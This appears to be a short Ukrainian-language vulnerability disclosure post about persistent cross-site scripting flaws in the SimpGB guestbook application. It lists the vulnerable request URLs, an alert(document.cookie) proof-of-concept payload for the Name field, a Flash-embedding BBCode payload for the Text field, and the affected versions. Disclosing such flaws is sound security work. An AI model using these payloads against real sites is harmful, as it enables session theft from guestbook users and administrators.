Нові уразливості в SimpGB
15:29 14.07.201001.06.2010
У жовтні, 26.10.2009, я знайшов Cross-Site Scripting уразливості в SimpGB (причому це persistent XSS). Дані уразливості я виявив на одному сайті, де використовується даний веб додаток. Про що найближчим часом повідомлю розробникам.
Раніше я вже писав про уразливості в SimpGB.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.
14.07.2010
XSS:
Це persistent XSS в трьох функціоналах веб додатку.
POST запит на сторінках:
http://site/guestbook.php?lang=en&mode=new&layout=default
http://site/guestbook.php?lang=en&mode=new&layout=default"e=1
http://site/admin/usered.php?lang=en&mode=comment&input_entrynr=1&entrylang=en
<script>alert(document.cookie)</script>
В полі АВТОР (Name).
[swf width=1 height=1]http://site/flash.swf[/swf]
В полі ТЕКСТ (Text).
Атака можлива на старих версіях флеш плеєра, де була менш жорстка політика безпеки і можна було виконати JS-код з флешек з зовнішніх ресурсів. В 9 і наступних версіях флеш плеєра атака спрацює лише якщо swf-файл буде на тому самому домені.
Уразливі SimpGB V1.37.3 та попередні версії. Як я перевірив, в SimpGB v1.49.01 вже немає першої уразливості, але все ще є XSS через Flash.